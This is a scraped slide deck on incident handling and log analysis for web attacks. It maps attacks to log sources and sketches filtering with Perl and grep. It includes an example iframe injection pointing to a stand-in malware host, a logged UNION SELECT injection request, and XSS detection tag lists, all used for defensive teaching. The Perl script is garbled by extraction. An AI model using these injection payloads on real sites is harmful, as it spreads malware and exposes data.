Incident Handling - PowerPoint PPT Presentation

About This Presentation
Title:

Incident Handling

Description:

Incident Handling & Log Analysis in a Web Driven World Manindra Kishore Web Incidents - Overview A Glimpse of popular web based incidents Discussion of a sample ... – PowerPoint PPT presentation

Number of Views:202
Avg rating:3.0/5.0
Slides: 31
Provided by: Manindra6
Category:

less

Transcript and Presenter's Notes

Title: Incident Handling


1
Incident Handling Log Analysisin a Web Driven
World
Manindra Kishore
2
Web Incidents - Overview
  • A Glimpse of popular web based incidents
  • Discussion of a sample incident
  • Approach to Incident Analysis

3
A glimpse of few popular incidents
  • SQL injection
  • XSS
  • CSRF
  • Broken authentication
  • Broken authorization
  • File inclusion
  • Password brute force
  • Directory traversal
  • Malicious file upload
  • Network enumeration
  • .

4
A few Attack Objectives
  • Force connection to malware infected remote site
  • Trick user into connecting to phishing site
  • Steal data from backend database
  • Obtain sensitive information from other internal
    machines
  • A common attack vector --- SQL Injection

5
A sample incidentMalware Download / Visit
Phishing sites
  • SQL Injection to change values in the backend DB
  • Values changed to known malware distributing
    sites
  • Each time page loads - Malware downloaded
  • Multiple systems under attacker control

6
Web site distributes malware
http//bank.com/homepage.jsp
Exploits and Adds iframe Tag ltiframe src
http//malware.com/malware"gt lt/iframegt in page
http//bank.com/homepage.jsp
Home Page gets infected
Infected page served to user
Accesses http//bank.com/homepage.jsp and finds
out vulnerabilities
Infected page Access request
http//bank.com/homepage.jsp
Connection made to external site and malware gets
downloaded in background
7
Incident occurred !!!What to do now?
8
A sample victimized 2 tier network
  • The web server on intranet got hacked.
  • I dont know what else got hacked.
  • I want Incident Analysis.

9
Acting ahead
  • Enumerate all entry points of network
  • Identify the components associated with
    victimized component in network traffic
  • Obtain logs of all associated components
  • Perform Log Analysis
  • This presentation focuses primarily on the
    attacks over the internet.
  • Analysis of Intranet based attacks involve more
    or less the same steps not on the key focus here.

10
Candidates for Log Analysis(in this case)
  • Cisco Internet Router
  • Cisco PIX Internet Firewall
  • Juniper Intranet Firewall
  • Cisco L3 switch connecting all other servers
  • IIS 6.0 Web Server
  • Tomcat Application Server
  • Microsoft SQL Server Database

11
Grounds for forensics Log Analysis
12
A re-look at the attacks traceable by logs
  • A glimpse of major attacks for which forensics
    can be done by different sets of logs
  • SQL Injection
  • XSS
  • SSI Injection
  • Directory Traversal Attack
  • PHP Remote File Inclusion Attack
  • Upload Malicious Files
  • Re-direction Attack
  • Unwanted Apps/Directories open to Internet
  • Misusing link for activation/authentication
  • Brute Forcing
  • Enumerating Data based on error messages/app
    features
  • Session Hijack
  • Deep URL
  • Change Password
  • Automated Attacks
  • Response Splitting Attack
  • Arbitrary HTTP methods allowed

13
Mapping Attack patterns to Logs
SQL Injection in the application retrieving data Web Logs/Database Logs
SQL Injection in the application injecting Iframe into database Web Logs/Database Logs
Persistent XSS on website Web Logs/Database Logs/Database Backup
PHP Local and Remote File inclusion to obtain source code and passwords Web Logs/Source Code
PHP Code Injection to retrieve database password Web Logs/Database Logs
Anonymous FTP / brute force passwords and steal backup stored FTP Logs
Direct connection to the Database and retrieve data Database Logs/OS Logs
Files available on the website found through directory browsing Web Logs
Brute forcing SAM file , RDP in and stealing database OS Logs
Upload an executable which will take a backup of the database and dump it out Web Logs/OS Logs/Database Logs
Vulnerability inside the application which allows DB backup/restore Application Logs/Database Logs
Identification of all other network services and check if any other way in Individual Network Service Logs
File upload of malicious file Web Logs/OS Logs/Database Logs
Compromise of another server and gain access to this server through a vulnerability there or by trust abuse of that server Network Device Logs (Firewall Switch)
Physical access to the server and copying data on removable media OS Logs
14
Choosing the right Log for analysis
  • Different device logs help in forensics of
    different attack patterns
  • Focusing on Internet based attacks, the major
    components for analysis are
  • Web Server
  • Database Server

15
Individual Analysis of elements
  • The components under discussion
  • Web Servers
  • IIS
  • Apache
  • Database Servers
  • MySQL
  • MSSQL

16
Web Server Log Analysis Step 1
  • Web Server Logs are huge
  • Filter the relevant logs for analysis Script
    based approach
  • Eliminate all requests for non-existing files on
    webserver
  • Obtain the list of all valid files from webpage
    source code
  • Obtain all requests from the webserver with
    200_OK response
  • Do the matching, filter only relevant requests,
    eliminate the rest.

17
  • Example
  • In a banking website we see a request for
    3Dgames.php in the Apache log its obviously not
    valid.
  • This can be confirmed by looking inside the
    source code directory and checking if there
    indeed was a file called 3Dgames.php.
  • If not then we don't need to waste time analyzing
    those requests.
  • A little bit of Basic Perl can help here.

18
A sample Perl Script
  • A sample script for finding out valid PHP pages -
    Can be modified for other types as well.
  • SCRIPT
  • !/usr/bin/perl
  • open(PAGE , "ltpage_list") or die "Cannot open
    file!"
  • _at_all_pages ltPAGEgt
  • close(PAGE)
  • open(ALLPHP , "ltgateway_only200_OK") or die
    "Cannot open file!"
  • _at_all_php_requests ltALLPHPgt
  • close(ALLPHP)
  • open(VALIDPHP , "gtall_valid_php") or die "Cannot
    open file!"
  • for (j0 jltall_pages j)
  • chomp(all_pagesj)
  • _at_ddd grep(/all_pagesj/ ,
    _at_all_php_requests)
  • print VALIDPHP _at_ddd
  • close(VALIDPHP)

19
Web Server Log Analysis Step 2
  • Identifying Valid Variables In Remaining
    requests
  • List all the valid variables from page source
    code Script based approach
  • Compare all the requests for presence of all
    valid variables
  • If any invalid variable found in a request,
    eliminate the request
  • Eventually, filter out all requests with all
    valid variables

20
  • A sample Perl Script output
  • 204.9.126.178 - -
  • 05/Aug/2009113154 -0500
  • "GET /category.php?q27UNIONSELECTTABLE_CATALO
    G2CTABLE_SCHEMA2Ccatidsearchsearchgo.x17s
    earchgo.y12 HTTP/1.1"
  • --------------------
  • The variables here are - q, catid, searchgo.x and
    searchgo.y
  • The requested page is - category.php
  • Now look at the list of valid variable from
    source code of page category.php (script based
    approach)
  • Figure out if the variables in request figure out
    here
  • If not, then its not a valid request and can be
    eliminated
  • Repeat the process for all requests (Script based
    approach as a whole)
  • Eventually, filter out all request with valid
    variables

21
Web Server Log Analysis Step 3
  • Identify specific attack patterns - using a Log
    Parsing tool
  • Example
  • While trying to detect a directory traversal
    attack one needs to parse the logs for the
    ../../ pattern among others.
  • Sample queries to carry out parsing process

22
The Demos
  • SQL Injection
  • Cross Site Scripting (XSS) Persistent
  • Directory Traversal
  • PHP remote file inclusion
  • URL Redirection
  • Automated / Brute Force attacks
  • Password cracking
  • Automated registrations
  • Session prediction
  • Directory brute forcing

23
DB Server Log Analysis
  • Attacks that can be detected by looking at the
    logs of a DB Server
  • SQL Injection
  • XSS
  • Brute Forcing the DB Server

24
Log Analysis MySQL DB Server
  • SQL Injection
  • Obtain the Query Logs. They are generally
    available in /mysql/data/
  • Do a Code Review of the application and list down
    all the SQL queries from all pages on the
    application.
  • Match all the Queries in the Query Log with those
    obtained from code review. All queries which
    match are valid queries. The rest are invalid
    queries. Store all these invalid queries in a
    separate file as these are most probably the
    queries that an attacker used for SQL Injection.

25
Sample Grep Queries
  • Sample Grep queries to perform the action

26
  • Cross Site Scripting (XSS) Persistent
  • Parse the database for any instance of XSS. This
    can be done by pattern matching.
  • Note down all the XSS strings found in the DB
  • Check the DB Query Log for instances of the
    string noted down. This can be done using the
    grep command.

27
  • Exact elements for monitoring
  • Search for all these elements as follows

ltagt href
ltiframegt src, url
ltembedgt src, pluginspage, pluginurl, href
ltobjectgt archive, classid, codebase, data usemap
ltscriptgt src
ltimggt longdesc, src, usemap
ltappletgt code, codebase, archive
ltareagt href, coords
28
More Attack Patterns
  • Brute Forcing the DB Server
  • Go through the Error Logs in order to see if
    there are repeated failed attempts in limited
    time duration.

29
What do we achieve?
  • Advantages of doing Log Analysis this way
  • What have we not covered here and hope to cover
    in the future?

30
Thank You.
Questions welcomed
  • Manindra Kishore
  • Information Security Analyst / Consultant
  • manindra.kishore_at_paladion.net
Write a Comment
User Comments (0)
About PowerShow.com